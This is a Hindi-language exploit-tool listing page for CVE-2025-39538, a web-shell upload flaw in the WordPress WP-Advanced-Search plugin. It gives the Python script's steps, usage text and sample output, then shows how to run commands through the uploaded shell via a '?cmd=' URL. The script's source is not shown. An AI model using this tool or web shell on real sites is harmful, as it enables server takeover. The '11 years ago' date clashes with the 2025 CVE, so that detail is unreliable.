Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-39538 — WordPress WP-Advanced-Search <= 3.3.9.3 - मनमाना फ़ाइल अपलोड भेद्यता | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-39538
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2025-39538

CVE-2025-39538

WordPress WP-Advanced-Search <= 3.3.9.3 - मनमाना फ़ाइल अपलोड भेद्यता

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛡️ CVE-2025-39538 - WordPress WP-Advanced-Search <= 3.3.9.3 मनमाना फ़ाइल अपलोड

CVE-2025-39538
प्रकाशित: 2025-04-16
भेद्यता प्रकार: मनमाना फ़ाइल अपलोड (खतरनाक प्रकार की फ़ाइल का अनियंत्रित अपलोड)
प्रभावित प्लगइन: WP-Advanced-Search (मैथ्यू चार्टियर द्वारा)
प्रभावित संस्करण: 3.3.9.3 तक के सभी संस्करण (3.3.9.3 सहित)

यह भेद्यता एक प्रमाणित हमलावर को प्लगइन द्वारा प्रदान की गई आयात कार्यक्षमता का उपयोग करके सर्वर पर एक दुर्भावनापूर्ण PHP फ़ाइल (जैसे वेब शेल) अपलोड करने की अनुमति देती है। अपलोड की गई फ़ाइल WordPress की अपलोड्स निर्देशिका में रखी जाती है और रिमोट कोड निष्पादन का कारण बन सकती है।

🧱 अपलोड पथ:

root@kitploit:~
wp-content/uploads/2025/04/

⚙️ एक्सप्लॉइट स्क्रिप्ट के बारे में

यह Python स्क्रिप्ट निम्नलिखित कार्य करती है:

  1. प्रदान किए गए क्रेडेंशियल्स का उपयोग करके WordPress साइट में लॉग इन करती है।
  2. आयात/निर्यात एडमिन पेज से आवश्यक wp_advanced_search_up_nonce निकालती है।
  3. विशेष रूप से तैयार POST अनुरोध के माध्यम से वेब शेल (PHP फ़ाइल) अपलोड करती है।

🚀 उपयोग

root@kitploit:~
usage: a.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g., http://127.0.0.1/wordpress)
  -un, --username USERNAME
                        WordPress Username
  -p, --password PASSWORD
                        WordPress Password

🖥️ उदाहरण आउटपुट:

root@kitploit:~
[*] Attempting login...
[+] Logged in successfully.
[*] Fetching nonce from import/export page...
[+] Nonce extracted: 2140855687
[*] Attempting to upload shell...
[+] File uploaded (check wp-content/uploads or temp directory).

🐚 अपलोड किए गए शेल का उपयोग

अपलोड के बाद, आप अपने शेल तक इस प्रकार पहुँच सकते हैं:

root@kitploit:~
http://target.site/wp-content/uploads/2025/04/nxploit.php?cmd=whoami

whoami को किसी भी Linux कमांड से बदलें जिसे आप निष्पादित करना चाहते हैं, उदाहरण के लिए:

  • id — वर्तमान उपयोगकर्ता ID दिखाता है।
  • pwd — वर्तमान निर्देशिका दिखाता है।
  • ls — फ़ाइलों की सूची दिखाता है।

⚠️ अस्वीकरण


यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।
लेखक इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।


द्वारा: Nxploited | Khaled Alenazi

टूल डाउनलोड करें